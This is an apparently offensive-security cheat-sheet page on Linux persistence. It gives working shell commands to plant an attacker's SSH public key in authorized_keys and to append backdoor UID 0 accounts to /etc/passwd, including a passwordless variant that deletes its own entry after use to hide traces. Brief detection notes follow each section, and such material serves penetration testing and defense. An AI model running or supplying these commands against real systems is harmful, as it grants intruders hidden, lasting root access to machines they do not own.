########################
Payload/Loot/Persistence
########################

*******************
SSH Key Persistence
*******************

| Prepare your public key

.. code-block:: bash

    # Retrieve your public key from private key
    PUB=$(ssh-keygen -i -f <(ssh-keygen -e -f ~/.ssh/id_rsa))
    # Generate command to type on target
    echo -e "echo '$PUB'>>~/.ssh/authorized_keys"

| Create ~/.ssh/authorized_keys if it doesn't exist on target

.. code-block:: bash

    mkdir ~/.ssh
    chmod 700 ~/.ssh
    touch ~/.ssh/authorized_keys
    chmod 600 ~/.ssh/authorized_keys

| Detection: a new entry in ``~/.ssh/authorized_keys`` shows up in file-integrity monitoring or an audit watch on that file, and in a review of authorized keys against the keys each account is expected to hold.
|

********
Add user
********

.. code-block:: bash

    echo -n '1337'|openssl passwd -stdin -6
    $6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.

    cat <<'EOF'>>/etc/passwd
    hacker:$6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.:0:0:Hacker Account:/root:/bin/bash
    EOF

    # Remove
    # sed -i '/hacker/d' /etc/passwd

|
| Or without password

.. code-block:: bash

    # Add user if passwd is writable
    cat <<'EOF'>>/etc/passwd
    hackerhackerhacker::0:0:root:/root:/bin/bash
    EOF
    su - hackerhackerhacker -c "sed -i '/hackerhackerhacker/d' /etc/passwd;id;su -"

| Detection: both variants depend on write access to ``/etc/passwd`` and add a second UID 0 entry, which ``awk -F: '$3 == 0' /etc/passwd`` lists while it is present. The passwordless variant deletes its entry right after use, so an audit watch on writes to ``/etc/passwd`` is the reliable signal there.
|